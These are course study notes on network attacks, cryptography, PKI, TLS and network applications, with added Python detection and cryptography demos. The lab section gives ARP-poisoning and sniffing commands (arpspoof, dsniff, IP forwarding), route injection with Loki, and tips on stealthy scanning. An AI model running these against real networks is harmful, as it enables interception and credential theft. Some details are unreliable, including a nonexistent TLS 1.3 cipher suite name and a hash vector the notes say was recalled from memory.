          4. DNS spoofing (cache poisoning): forge a response that arrives before the real one, guessing the 16-bit transaction ID (and the source port, if it is not randomized)
            1. mitigation: DNSSEC (signed records), source-port randomization, and certificates on the services themselves so a wrong answer fails validation
          5. Email spoofing
            1. lacks of authentication features in SMTP protocol
            2. Mitigation
              1. spam filtering
              2. cross check email header from
              3. Do not click unknown sources
              4. digital certificates, strong passwords, signatures
          6. Land attack: file land.c
            1. sends a TCP SYN request using the same IP address and port as both the source and destination IP address and port, leads to a system crash if vulnerable;
        13. DHCP attacks
          1. DHCP starvation
          2. DHCP spoofing (lead MITM attack)
          3. Mitigation
            1. DHCP snooping by Cisco switch (rate limit and port control)
        14. Lab: Explore TCP/IP attacks
          1. footprinting techniques: profiling target and difficult to detect
            1. whois -H ... | more: the -H argument removes the lengthy legal disclaimers from the output;
            2. nslookup
            3.  track information about public Internet presence
              1. What’s that site running?
            4. Google hacking:  “classified” filetype:pdf site:targetorgnization.domain
          2. Fingerprinting (scanning to clearer picture)
            1. slowing the rates of scanning and use other obfuscation techniques to limit attention;
            2. Zenmap Ping Scan: two types of probes – an ICMP echo request and a crafted TCP ACK destined to TCP port 80
            3. Zenmap Quick Scan: list of opened ports
            4. Zenmap Intense Scan: noisy but could recognize app version
          3. Discrete OS Scanning
            1. default initial TTL: Cisco IOS 255, Windows 128, Linux 64;
            2. Window size value
          4. Passive OS Fingerprinting (packet capture)
            1. reveal TTL values and initial TCP window sizes;
            2. Linux patches: IP Personality and Stealth Patch;
          5. Malicious Route Injection (work with other attacks)
            1. Loki is a security tool that was written to demonstrate weaknesses in routing protocols
            2. Loki negotiates with the Inside-Rtr, you should see the STATE start in Hello and cycle through 2WAY, EXSTART, EXCHANGE, and LOADING. It might also reach FULL after LOADING
            3. sh ip ospf neighbor
            4. sh ip route
          6. ARP Cache Poisoning
            1. Objective: MITM attack
            2. Tool: dsniff suite
            3. command to view the cache: arp -a
            4. Linux command: arpspoof -t <victim> <gateway> (and the reverse direction for full duplex)
            5. dsniff -c starts dsniff in half-duplex mode, monitoring the traffic being passed through
            6. sysctl -w net.ipv4.ip_forward=1 enables IP forwarding on Inside-Kali so the victim's traffic is relayed instead of dropped
            7. fingerprinting the gateway showed that Telnet was enabled – interesting for interception, because credentials travel in clear text
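An added detection example, not part of the lab, covering the ARP poisoning described in the MITM and spoofing sections and in the lab step above. It implements the two checks an ARPwatch-style monitor makes: an IP whose MAC changes, and one MAC claiming several IPs (what arpspoof produces when it impersonates both the gateway to the victim and the victim to the gateway). The ARP messages are constructed for the example, as are the addresses.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ArpMsg:
    t: float          # seconds since capture start
    op: str           # "request" or "reply"
    sender_ip: str
    sender_mac: str
    target_ip: str


# Constructed ARP traffic (not a capture). Gateway 10.1.1.1 and victim 10.1.1.5 are legitimate;
# an attacker at cc:cc:cc:00:00:99 runs the equivalent of
#   arpspoof -t 10.1.1.5 10.1.1.1   and   arpspoof -t 10.1.1.1 10.1.1.5
SAMPLE = [
    ArpMsg(0.0, "request", "10.1.1.5", "aa:bb:cc:00:00:05", "10.1.1.1"),
    ArpMsg(0.0, "reply",   "10.1.1.1", "aa:bb:cc:00:00:01", "10.1.1.5"),
    ArpMsg(0.1, "reply",   "10.1.1.5", "aa:bb:cc:00:00:05", "10.1.1.1"),
    ArpMsg(5.0, "reply",   "10.1.1.1", "cc:cc:cc:00:00:99", "10.1.1.5"),  # attacker claims the gateway
    ArpMsg(5.0, "reply",   "10.1.1.5", "cc:cc:cc:00:00:99", "10.1.1.1"),  # attacker claims the victim
    ArpMsg(7.0, "reply",   "10.1.1.1", "cc:cc:cc:00:00:99", "10.1.1.5"),  # repeated every 2 s
]


def detect_arp_poisoning(msgs, static_bindings=None):
    """ARPwatch-style check: alert when an IP's MAC changes, or one MAC claims several IPs.
    static_bindings (optional) seeds known-good pairs such as the gateway, so the first
    spoofed reply is caught even if no legitimate reply was seen first."""
    bindings = dict(static_bindings or {})
    alerts = []
    for m in msgs:
        # Only replies and gratuitous requests (sender == target) assert a binding.
        if m.op != "reply" and m.sender_ip != m.target_ip:
            continue
        prev = bindings.get(m.sender_ip)
        if prev is None:
            bindings[m.sender_ip] = m.sender_mac
        elif prev != m.sender_mac:
            alerts.append({"t": m.t, "kind": "flip", "ip": m.sender_ip,
                           "old": prev, "new": m.sender_mac})
            bindings[m.sender_ip] = m.sender_mac   # track what the victims' caches now hold
    by_mac = defaultdict(set)
    for ip, mac in bindings.items():
        by_mac[mac].add(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append({"t": None, "kind": "multi-ip", "mac": mac, "ips": sorted(ips)})
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE, {"10.1.1.1": "aa:bb:cc:00:00:01"}):
        print(alert)
```

On a switch, Dynamic ARP Inspection does the same binding check in the data path using the DHCP snooping table, and drops the spoofed reply instead of merely alerting.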
        15. Challenge: smurf
      4. Understanding Basic Cryptography Concepts
        1. Intro: Conficker, CIA triad
        2. Impact of Cryptography on Security Investigations
          1. attack the cryptography: target weaknesses in the algorithm or, more often, in its implementation
            1. eg. OpenSSL Heartbleed (CVE-2014-0160): a bounds-check bug in the TLS heartbeat extension, not a flaw in TLS itself, let clients read private data (including private keys) from server memory;
          2. use encryption to hide the attack from monitoring;
            1. Detection: TLS/SSL decryption and inspection, or using NetFlow metadata to detect anomalous TLS/SSL flows without decrypting;
        3. Cryptography Overviews
          1. Elements of cryptography (CDON)
            1. Confidentiality: only authorized on can read;
            2. Data integrity: any changes will be detected and rejected;
            3. Origin authentication: only sent from the perceived  origin;
            4. Non-repudiation: original cannot deny producing the message;
          2. Cryptanalysis: study of determining and exploiting weakness
          3. Types of Ciphers
            1. Substitution cipher: substitute one letter for another;
            2. Polyalphabetic cipher: multiple substitution alphabets;
            3. Transposition cipher: rearrange or permutate letters;
            4. One-time pad: XOR operation to plaintext with a random key;
        4. Hash Algorithms
          1. data integrity assurance: one-way mathematical function, infeasible to reverse; a plain hash alone does not stop a man-in-the-middle (who can recompute it after changing the data); keyed hashes (HMAC) add authentication of the data origin;
          2. hash code, hash value, hash sum;
          3. Challenge:
            1. Hash Collison: identical output for different inputs;
          4. Message Digests
          5. Types:
            1. MD5 (Message Digest 5): 128-bit hash; practical collisions exist, do not use for security;
            2. SHA-1 (Secure Hash Algorithm 1): US-developed NIST standard, 160-bit hash; collisions demonstrated in 2017, deprecated for signatures;
            3. SHA-2: SHA-224/256/384/512, current default;
            4. SHA-3: Keccak-based, different construction from SHA-2;
            5. Message rearranging (course example of a toy hash, not secure)
            6. Division remainder (course example of a toy hash, not secure)
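An added example, not from the course, for the hash-integrity point above: it shows why a plain hash appended to a message gives integrity but no origin authentication (an on-path attacker just recomputes it), and how an HMAC with a shared key closes that gap. Python's standard hashlib and hmac modules are used; the message and key are constructed for the example, and digest lengths of the algorithms listed in the notes are reported from the library.

```python
import hashlib
import hmac

MESSAGE = b"transfer 100 to account 42"                      # constructed sample
KEY = b"shared-secret-known-only-to-the-two-parties"         # constructed sample key


def plain_tag(msg):
    """Integrity only: anyone can recompute this, so it proves nothing about who sent it."""
    return hashlib.sha256(msg).hexdigest()


def hmac_tag(key, msg):
    """Integrity + origin authentication: computing it requires the shared key."""
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def verify_plain(msg, tag):
    # compare_digest avoids leaking the match position through timing
    return hmac.compare_digest(plain_tag(msg), tag)


def verify_hmac(key, msg, tag):
    return hmac.compare_digest(hmac_tag(key, msg), tag)


def tamper_with_plain_hash(msg):
    """What a man-in-the-middle does when only a plain hash protects the message:
    change the content and recompute the hash; the receiver cannot tell."""
    tampered = msg.replace(b"account 42", b"account 99")
    return tampered, plain_tag(tampered)


def digest_bits():
    """Output size in bits of the hash functions listed in the notes."""
    return {name: hashlib.new(name).digest_size * 8
            for name in ("md5", "sha1", "sha256", "sha512", "sha3_256")}


if __name__ == "__main__":
    tampered, forged = tamper_with_plain_hash(MESSAGE)
    print("plain hash accepts forgery:", verify_plain(tampered, forged))
    original_mac = hmac_tag(KEY, MESSAGE)
    print("HMAC accepts original   :", verify_hmac(KEY, MESSAGE, original_mac))
    print("HMAC accepts forgery    :", verify_hmac(KEY, tampered, original_mac))
    print(digest_bits())
```

The attacker can change the message but, without the key, cannot produce a tag the receiver will accept; that is the property a digital signature provides too, with a private key in place of the shared secret.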
        5. Encryption Overview: process of hiding message
          1. Plaintext > ciphertext (and back again on decryption);
          2. Encryption key & Encryption Algorithm;
          3. Types of Encryption
            1. Application layer – PGP (Pretty Good Privacy), SSL/TLS
            2. Internet layer – IPsec
            3. Data link layer – MACsec (802.1AE)
          4. Encryption Algorithms
            1. longer keys take longer to crack, but performance overhead;
            2. Symmetric
            3. Asymmetric: public key and private key
        6. Cryptanalysis: the practice of breaking the codes
          1. Brute-force attack: trying every possible key
            1. DES (56-bit key, brute-forced in days already in 1998), AES (128-bit minimum, infeasible)
          2. Ciphertext-only attack: attacker has only ciphertext to work from
            1. known-plaintext attack: attacker has some plaintext and the matching ciphertext;
            2. chosen-plaintext / chosen-ciphertext attack: attacker can get chosen inputs encrypted or decrypted and analyzes the results to recover the key
          3. Birthday attack: brute-force search for collisions in a hash function, which succeeds after about 2^(n/2) attempts for an n-bit hash;
          4. Meet-in-the-middle: attacker knows a portion of the plaintext and the corresponding ciphertext; stores values of the encrypted plaintext and the decrypted ciphertext and looks for a match (why double DES is no stronger than single DES);
        7. Symmetric Encryption Algorithms
          1. same key for encryption and decryption;
            1. 40 bits to 256 bits, better larger than 80 bits;
          2. Challenge: key management
          3. Symmetric encryption algorithms
            1. DES: encrypts data in 64-bit blocks; 64-bit key of which 56 bits are used for encryption and 8 bits for parity;
              1. 2 standardized block cipher modes:
                1. ECB (Electronic Codebook): encrypts each block independently, so identical plaintext blocks give identical ciphertext blocks (leaks patterns);
                2. CBC (Cipher Block Chaining): each block is XORed with the previous ciphertext block before encryption, so it depends on all previous blocks;
            2. 3DES – EDE (Encrypt – Decrypt – Encrypt), effective strength 112 bits
            3. AES: replaced 3DES; 128-bit blocks, 128/192/256-bit keys
            4. RC4: stream cipher once used to secure web traffic in SSL and TLS; now broken and prohibited in TLS (RFC 7465)
          4. Rotate keys often
        8. Asymmetric Encryption Algorithms
          1. Encrypt with the target public key;
          2. Decrypt with the private key;
          3. RSA (1024-4096-bit keys; 1024 is no longer considered adequate, use 2048 or more)
          4. rotate keys every few months
          5. PGP (Pretty Good Privacy): hybrid scheme
            1. sign the message with the sender's private key
            2. encrypt the message with a random symmetric session key, and encrypt that session key with the recipient's public key
        9. Diffie-Hellman Key Agreement (used in protocols such as SSL/TLS, SSH, and IKE);
          1. both agree on large prime number p and a generator g;
          2. Allowing the exchange of shared secrets over public medium without revealing the key;
          3. DH groups: higher group numbers are generally stronger (larger primes or elliptic curves), but DH alone does not authenticate the peers, so the protocol around it must (certificates, host keys, PSK), or a man-in-the-middle can run a separate exchange with each side;
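An added example, not from the course, of the Diffie-Hellman exchange described above, run with toy parameters (p = 23, g = 5; real protocols use 2048-bit-plus groups from RFC 3526/7919 or elliptic curves) and with Python's built-in pow. It shows that both sides derive the same secret while an eavesdropper only sees p, g and the two public values, and then shows the failure mode of unauthenticated DH: a man-in-the-middle who completes one exchange with each side shares a key with each of them. The private exponents are fixed for reproducibility.

```python
import hashlib
import secrets

# Toy parameters (NOT secure): p is prime and g = 5 is a generator mod 23.
P, G = 23, 5


def random_private(p=P):
    """A fresh private exponent in [1, p-2]; used for real runs, fixed values are used below."""
    return secrets.randbelow(p - 2) + 1


def dh_public(private, p=P, g=G):
    return pow(g, private, p)


def dh_shared(peer_public, private, p=P):
    return pow(peer_public, private, p)


def session_key(shared):
    """Derive a symmetric key from the shared secret (real protocols use a KDF/PRF)."""
    return hashlib.sha256(shared.to_bytes(32, "big")).hexdigest()


def honest_exchange(a_priv=6, b_priv=15):
    """Alice and Bob exchange public values; returns both secrets and what the wire shows."""
    A, B = dh_public(a_priv), dh_public(b_priv)
    on_the_wire = (P, G, A, B)          # all an eavesdropper gets to see
    return dh_shared(B, a_priv), dh_shared(A, b_priv), on_the_wire


def mitm_exchange(a_priv=6, b_priv=15, m_priv=9):
    """Unauthenticated DH: Mallory replaces both public values with her own and ends up
    holding one key with Alice and another with Bob, re-encrypting in between."""
    A, B, M = dh_public(a_priv), dh_public(b_priv), dh_public(m_priv)
    alice_key = dh_shared(M, a_priv)          # Alice believes M came from Bob
    bob_key = dh_shared(M, b_priv)            # Bob believes M came from Alice
    mallory_with_alice = dh_shared(A, m_priv)
    mallory_with_bob = dh_shared(B, m_priv)
    return alice_key, bob_key, mallory_with_alice, mallory_with_bob


if __name__ == "__main__":
    ka, kb, wire = honest_exchange()
    print("wire:", wire, "alice:", ka, "bob:", kb, "key:", session_key(ka)[:16])
    print("mitm:", mitm_exchange())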
        10. Use Case: SSH process of communication
          1. Command line application
          2. encryption, integrity, origin authentication
          3. SSHv1 (not secure): server's public/private key pair used to encrypt the session's symmetric key; weak CRC-32 integrity check allows insertion attacks; replaced by v2
          4. SSHv2: Diffie-Hellman key exchange with the server host key signing the exchange, plus MAC-based integrity
        11. Digital Signatures
          1. authenticity, integrity, nonrepudiation
          2. created with the private key of the sender, verified with the sender's public key
          3. consists of a hash function and a signing (asymmetric) function
            1. hash the data, sign the hash fingerprint with the RSA private key, attach the signature to the data and send; the receiver hashes the data again and verifies the signature with the public key
        12. PKI Overview
          1. trusted 3rd party
          2. CA hierarchy: trusted third party
            1.  CA signs the certificate;
            2.  encrypts the hash using its private key;
            3. CA send signed certificate to Web server;
          3. Certificate: A document, which in essence binds together the name of the entity and its public key
          4. PKCS: Public Key Cryptography Standard
          5. X.509 is an ITU-T standard for PKI
        13. PKI Operations
          1. CA hierarchy
          2. pre-loaded CA public key (Root Certificate) in Internet browsers
            1. to authenticate other’s public keys
            2. manually, use an out-of-band method to validate the certificate
          3. obtain identity certificate
            1. first step is to obtain the CA’s identity certificate;
            2. create a CSR (certificate signing request) (PKCS #10) (enrolling system’s public key is included)
            3. identity data from the CSR, and add in the CA-specified data, such as serial number, the dates, and the algorithm, to complete the X.509v3 structure
            4. sign the certificate by hashing the certificate data and encrypting the hash with the CA's private key
            5. all users use the root CA's public key to validate the signature on any certificate they receive
            6. Send a message encrypted with the peer's public key to verify that the peer can decrypt it with its private key
          4. Certificate Revocation (if keys are thought to be compromised)
            1. centralized function, providing “push” and “pull” methods to obtain a list of revoked certificates;
            2. to check for certificate revocation
              1. CRL (certificate revocation list) (signed file with serial no. of revoked cert.)
                1. Poll CRL
                2. small time period when CRL has not yet propagated
              2. OCSP (Online certificate status protocol)
                1. immediate push to online database
                2. query anytime to check for validity
        14. Use case: SSL/TLS
          1. Process
            1. User connects to port 443 for SSL/TLS
            2. server replies with its identity certificate containing its public key;
            3. user validates the certificate and public key
            4. user software creates a shared secret key and encrypts it with the server's public key;
            5. bulk encryption uses the shared secret key;
          2. Web browser security warnings
            1. hostname / identity mismatch
            2. validity date range (expiring)
            3. signature validation error
        15. Cipher Suite
          1. SSL (Secure Socket Layer)/ TLS (Transport Layer Security)
            1. For: client / server encryption; key exchange; message authentication;
            2. TLS1.2 added SHA-256 and SHA-384;
          2. 4 components of a Cipher Suite
            1. MAC (Message Authentication Code Algorithms)
            2. Key Exchange Algorithms
            3. Encryption Algorithms
            4. Authentication Algorithms
          3. TLS Cipher Suite Examples
            1. TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
            2. TLS1.2: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
            3. TLS1.3: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA_256_P384
          4. legacy cipher suites available in TLS are insecure: DES or RC4 encryption or MD5;
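A small parser for the cipher suite naming scheme above, added here as an example (not from the course notes): it splits a TLS 1.2-style name into the four components and flags the legacy algorithms and the lack of forward secrecy the notes warn about. The legacy lists and the regular expression are my own choices and cover the common kx/auth names only.

```python
import re

# Constructed policy lists, following the notes: DES/RC4 and MD5 are legacy,
# and only ephemeral (ECDHE/DHE) key exchange gives forward secrecy.
LEGACY_ENCRYPTION = {"NULL", "DES", "3DES", "RC4"}
LEGACY_MAC = {"MD5"}
FORWARD_SECRET_KX = {"ECDHE", "DHE"}

# TLS_<key exchange>[_<authentication>]_WITH_<encryption>_<mac>
SUITE_RE = re.compile(
    r"^TLS_(?P<kx>ECDHE|DHE|ECDH|DH|RSA|PSK)"
    r"(?:_(?P<auth>ECDSA|RSA|PSK))?_WITH_(?P<rest>[A-Z0-9_]+)$"
)


def parse_cipher_suite(name):
    """Split an IANA-style TLS 1.2 suite name into its four components."""
    m = SUITE_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised cipher suite name: {name}")
    kx = m.group("kx")
    # TLS_RSA_WITH_...: RSA both transports the key and authenticates.
    auth = m.group("auth") or kx
    enc, mac = m.group("rest").rsplit("_", 1)
    return {"key_exchange": kx, "authentication": auth,
            "encryption": enc, "mac": mac}


def assess_cipher_suite(name):
    """Return (components, problems); problems lists why the suite should
    not be offered under the notes' rules."""
    parts = parse_cipher_suite(name)
    problems = []
    cipher = parts["encryption"].split("_")[0]
    if cipher in LEGACY_ENCRYPTION:
        problems.append(f"legacy cipher {cipher}")
    if parts["mac"] in LEGACY_MAC:
        problems.append("MD5 MAC")
    if parts["key_exchange"] not in FORWARD_SECRET_KX:
        problems.append("no forward secrecy")
    return parts, problems


if __name__ == "__main__":
    for suite in ("TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384",
                  "TLS_RSA_WITH_RC4_128_MD5"):
        print(suite, assess_cipher_suite(suite))
```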
        16. Key Management
          1. Aspects
            1. Securely generate keys: strong and randomization
            2. Verify keys:
            3. Exchange keys: keying material used
            4. Store keys: trojan horse may access swap memory
            5. Destroy keys: all involved parties are notified
          2. key spaces: combinations / possibility
          3. larger key length = longer time
        17. NSA Suite B Compliance (devices must support to meet federal standards )
          1. Encryption: AES 128-256 with CTR / GCM;
          2. Digital Signature: ECDSA
          3. Key Exchange: ECDH
          4. Message Digest: SHA 256-384
        18. Explore Cryptographic Technologies Lab
          1. PKI -> Digital Signatures -> Asymmetric encryption and hashing
          2. Hashing – output as fingerprint / digest; one-way transforms
            1. linux: md5sum filename; sha1sum filename;
            2. MD5 collisions
            3. IOS enable secret (like *nix systems): a four-character salt phrase is generated and combined with the password text, and the result is hashed; the salt phrase and the resulting hash are stored in the running configuration
            4. show run | section enable
              1. $1 specifies that MD5 transformation is used
              2. $F/bO is a random four-character salt phrase
              3. the rest is the digest
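The $1$salt$digest format above is MD5-crypt. The code below re-implements it from the published algorithm, as an added example that is not from the course notes or from Cisco, so the "$1", the four-character salt and the 22-character digest can be seen being produced, and a stored secret verified the way the device does it (re-hash the candidate with the stored salt and compare). It also covers the salting point from the pass-the-hash section later in these notes. The known-answer value is the Packet Tracer default hash for the password "cisco", assumed from memory.

```python
import hashlib
import secrets

# crypt(3) base-64 alphabet; the notes' "$F/bO" salt uses these characters.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """Emit 'count' 6-bit groups, least significant first (crypt convention)."""
    return "".join(ITOA64[(value >> (6 * i)) & 0x3F] for i in range(count))


def md5_crypt(password, salt):
    """MD5-based crypt: returns "$1$<salt>$<22-char digest>"."""
    pw = password.encode()
    salt = salt.encode()[:8]
    ctx = hashlib.md5(pw + b"$1$" + salt)          # "$1" tags the MD5 scheme
    alt = hashlib.md5(pw + salt + pw).digest()
    remaining = len(pw)
    while remaining > 0:                            # mix in alt, 16 bytes at a time
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bits = len(pw)
    while bits > 0:                                 # one byte per bit of len(pw)
        ctx.update(b"\0" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()
    for i in range(1000):                           # stretching rounds slow guessing
        rnd = hashlib.md5()
        rnd.update(pw if i & 1 else final)
        if i % 3:
            rnd.update(salt)
        if i % 7:
            rnd.update(pw)
        rnd.update(final if i & 1 else pw)
        final = rnd.digest()
    digest = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        digest += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    digest += _to64(final[11], 2)
    return "$1$" + salt.decode() + "$" + digest


def new_salt(length=4):
    """Random salt like IOS generates for enable secret (four characters)."""
    return "".join(secrets.choice(ITOA64) for _ in range(length))


def split_hash(stored):
    """Split "$1$F/bO$..." into ("1", "F/bO", digest)."""
    _, tag, salt, digest = stored.split("$")
    return tag, salt, digest


def verify_enable_secret(password, stored):
    """Re-hash the candidate with the stored salt and compare in constant time."""
    tag, salt, _ = split_hash(stored)
    if tag != "1":
        raise ValueError("not an MD5 ($1$) secret")
    return secrets.compare_digest(md5_crypt(password, salt), stored)


# Well-known Packet Tracer default (assumed from memory): enable secret "cisco".
KNOWN_VECTOR = ("cisco", "$1$mERr$hx5rVt7rPNoS4wqbXKX7m0")


if __name__ == "__main__":
    print(md5_crypt("Cisco123!", new_salt()))
    print("known vector ok:", verify_enable_secret(*KNOWN_VECTOR))
```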
          3. Symmetric Encryption – Shared key algorithms
            1. linux command: diff artofwar.txt artofwar2.txt
            2. openssl enc -aes-128-cbc -in artofwar.txt -out artofwar.crypt
            3. openssl enc -d -aes-128-cbc -in artofwar.crypt -out artofwar3.txt
            4. openssl list-cipher-algorithms
          4. Asymmetric Encryption: more computationally expensive than symmetric encryption, thus asymmetric encryption protects the shared key and symmetric encryption is used for the bulk data transfer;
            1. debug ip ssh / undebug all
            2. terminal monitor command to display logging messages to this Telnet session
            3. Open another terminal: ssh -1 -l admin
            4. Digital signature: private key to encrypt hash value
              1. openssl genrsa -aes128 -passout pass:Cisco123! -out private.pem 4096
              2. openssl rsa -in private.pem -passin pass:Cisco123! -pubout -out public.pem
              3. /var/www/files#openssl rsautl -sign -inkey private.pem -in artofwar.digest -out artofwar.sig
              4. openssl rsautl -verify -inkey public.pem -pubin -in artofwar.sig
              5. file generation: private.pem > public.pem > artofwar.digest > artofwar.sig >
        19. Challenge
          1. avalanche effect: small changes in data causing a large change in the hash;
          2. Diffie-Hellman: DH prime number / DH base generator / DH group / DH modulus;
          3. ECDHE_ECDSA is stronger than RSA key exchange (forward secrecy): if the server's private key is later compromised, the prior TLS handshakes done with the cipher suite cannot be compromised
      5. Describing Information Security Concepts
        1. Information Security CIA
          1. vulnerability: weakness
          2. Trends bring needs of enhanced security:
            1. Growth in network size and ease of access;
            2. Widespread TCP/IP, which uses a common set of widely known ports and protocols;
            3. More complicated OSes and applications;
        2. PII (Personal Identifiable Information)
          1. apply confidentiality when handling it
        3. Risk = Threat*Vulnerabilities*Impact
          1. Threat: trigger
          2. Vulnerabilities: weakness
          3. Impact: damage
          4. Risk assessments: quantitative (by money) and qualitative (by grading);
          5. APT (Advanced Persistent Threat): network attack in which an unauthorized person gains access to a network and stays there undetected for a long time period
          6. Risk management: assess risk and manage to acceptable level
            1. Risk acceptance: cost
            2. Risk avoidance: most expensive
            3. Risk limitation: commonly used, mixed with acceptance and avoidance;
            4. Risk transfer: eg. insurance
        4. Vulnerability Assessment
          1. Risk analyst:
            1. what is/are vulnerabilities facing?
            2. differences between threats and vulnerabilities?
          2. 4 activities in vulnerability assessment process:
            1. device discovery
            2. service enumeration
            3. scanning
            4. validation
          3. Cycle: Discover -> Scan -> Interpret -> Mitigation;
          4. Penetration Testing
        5. CVSS v3.0 (Common Vulnerability Scoring System)
          1. Free and open industry framework
        6. Access Control Models
          1. Models
            1. Mandatory: strictest; in military; defined by administrators;
              1. uses security labels with classification and category
              2. access is granted when classification and category match;
              3. High management overhead;
            2. Discretionary (DAC) (eg. file system permission)
              1. By access control list;
              2. owner of the information can change the permissions;
            3. Non-discretionary (RBAC)
              1. based on role-based / rule-based;
            4. Others:
              1. least privileges: time based
              2. separation of duties: more than one person to complete a task;
        7. Regulatory Compliance
          1. PCI DSS / HIPAA…
        8. Information Security Management
          1. Identify assets and protection to them
          2. ITAM
          3. Configuration management: performance and requirement
          4. Patch management
          5. Vulnerability management
          6. MDM Mobile Device Management
          7. IT security control frameworks (best practices) (best to use together)
            1. COBIT
            2. ISO27002:2013
        9. Security Operations Center (SOC)
          1. SOC + NOC
          2. SIEM Security Information Event Management
          3. 3 types
            1. Threat-Centric SOC (most mature): think like attacker
            2. Compliance-based Centric SOC
            3. Operational-based SOC
          4. OpenSOC project
        10. Challenge
      6. Understanding Network Applications
        1. DNS Operations
          1. A: map hostnames to IPv4 address
          2. AAAA: map hostnames to IPv6 address
          3. PTR: map IPv4 address to hostname, reverse lookup;
        2. Recursive DNS Query
          1. DNS resolver (DNS client)
          2. DNS recursor (DNS recursive resolver)
          3. RR (Resource Record)
          4. Authoritative DNS query response (from local DNS database)
        3. Dynamic DNS
          1. RFC 2136
          2. map client login name of the DDNS software to client’s public IP;
          3. DDNS services use HTTP or HTTPS as the communication protocol;
        4. HTTP Operations
          1. URL:
            1. parameters / query strings
            2. multiple parameters are separated by &
            3. ? separates the resource path from the query string
            4. # introduces the fragment or named anchor
          2. HTTP request method
            1. GET: retrieves data
            2. HEAD: retrieves data without response body
            3. POST: create data
            4. PUT: update data
            5. DELETE: deletes
          3. Common status code
            1. 100=continue
            2. 200=OK
            3. 301=Moved Permanently
            4. 302=Found
            5. 307=Temporarily Moved
            6. 401=Unauthorized (require authentication)
            7. 403=Forbidden
            8. 404=Not Found
            9. 407=Proxy Authentication Required
            10. 500=Internal Server Error
          4. HTTP Cookies
            1. small piece of data that is sent from the web server and stored in the user’s web browser;
            2. remember stateful information
            3. Passed by using the Set-Cookie HTTP header field in the HTTP response, and the Cookie HTTP header in the HTTP request
          5. fields in the Set-Cookie HTTP header:
            1. Expires, Domain, Path
          6. HTTP Referer: referer header, which indicates the last page that the user was on (the page where the user clicked the link)
        5. HTTPS Operations
          1. HTTP over SSL / TLS (TLS is preferable)
          2. provides authentication of the server
          3. prevent MITM attacks
        6. Web Scripting
          1. HTML
          2. XML: markup language that defines rules for encoding documents
          3. CSS: define the styles of HTML and how it displayed to end users
          4. server side scripting
          5. client side scripting (JavaScript / VBscript)
        7. SQL Operations
          1. understand how to recognize SQL attack
          2. SQL injection
          3. Data Exfiltration Attacks: SELECT
          4. Data structure Attacks: UPDATE / ALTER
        8. SMTP Operations
          1. SPAM: flood of unsolicited emails and spreads virus
          2. Terms
            1. MTA / SMTP daemon: software agent eg. Outlook
          3. 3 parts: Envelope / Headers / Data
          4. Commands:
            1. Hello / EHLO
            2. MAIL FROM
            3. RCPT TO
            4. DATA
            5. QUIT
          5. 3-digit reply codes in mail systems; the first digit denotes the success or failure of the SMTP command:
            1. 1 = command accepted but pending confirmation (example, 101 can’t open connection)
            2. 2 = success (example, 250 OK)
            3. 3 = okay so far (example, 354 go ahead, also called start mail input)
            4. 4 = temporary failure (example, 452 mailbox full)
            5. 5 = permanent failure (example, 550 user unknown)
            6. The second digit categorizes the result:
              1. 0 = syntax
              2. 1 = information
              3. 2 = connection
              4. 3 = unspecified
              5. 4 = unspecified
              6. 5 = mail system
            7. The third digit adds finer detail.
        9. Explore Network Applications (Lab)
          1. Sending email, and see how rich text and binary files can be encoded in emails
          2. SMTP commands are four characters long. Examples include HELO, EHLO, MAIL, RCPT, DATA, RSET, and VRFY.
            1. The HELO command is for the original SMTP; the EHLO command is for the extended ESMTP;
          3. Send email in telnet session by command
            1. Enter EHLO [] into the SMTP session
            2. Compose the email
              1. MAIL FROM:<william@services.public>
                #250 2.1.0 Ok // plain SMTP would only respond with a 250 code, which basically means "I accepted that, please continue"; ESMTP adds the three-part decimal code for more precision. 250 2.1.0 means "Sender e-mail address ok."
              2. RCPT TO:<wendy@abc.public>: 250 code means “I accepted that, please continue.” The additional 2.1.5 indicates “Recipient e-mail address ok.”
              3. DATA: 354 response indicates that SMTP server is ready to receive the actual email message;
              4. To: wendy@abc.public
                From: King Willie III
                Subject: How are you?

                1. SMTP does not verify the address entered in FROM, thus spoofing tricks occur here and with REPLY-TO;
              5. Hi Wendy,
                This is a test message. I’m sending this manually! Can you believe it?
                Take Care,
              6. the server spools the data you are sending, waiting for a period (.) on a line by itself.
              7. code 250 2.0.0 indicates that the email message was accepted for delivery; This step does not terminate the SMTP session until the command QUIT. Multiple emails may be transmitted in a single session. After QUIT, the PuTTY window will immediately close.
            3. POSTFIX
              1. /etc/postfix/relay_recipients
                1. record domain which is allowed to forward to;
              2. /etc/postfix/transport
                1. allowed email will forward to;
            4. Examine HTML script (1st browser-side processing)
              1. HTML tags surround the appropriate content. Some tags are paired, such as you see here with <head>, </head>, <title>, </title>. Some tags start with a < tag and close with a /> tag, as you see here with the link and meta tags;
              2. <head> element of an HTML document contains the metadata;
              3. shortcut icon is also displayed on the browser tab;
              4. broke body in division by <div> tag;
            5. Examine CSS (2nd browser-side processing)
              1. numerous background properties, which share the same specifications for different browsers;
              2. banner, navcontainer, and content divs
            6. Examine Javascript (3rd browser-side processing)
              1. jQuery is a library that uses base JavaScript functions to build commonly used higher-level functions
              2. The “min” distribution of jQuery is optimized to consume as little bandwidth as possible. As you can see, all unnecessary whitespace is removed from the code
            7. Examine PHP (server-side processing)
            8. Examine SQL
            9. Examine URL
              1. Protocol; Host; Port; Resource Path; Query
            10. HTTP Requests: GET and POST
              1. HTTP is a stateless protocol
        10. Challenge
      7. Understanding Common Network Application Attacks
        1. Passwords Attacks
          1. password guessing
          2. brute-force attacks
          3. dictionary attacks
          4. phishing attacks
          5. online password attack: can become a form of DoS attack when accounts lock out after repeated failed logins;
          6. offline password attack: make countless attempts to crack the password hash without being noticed;
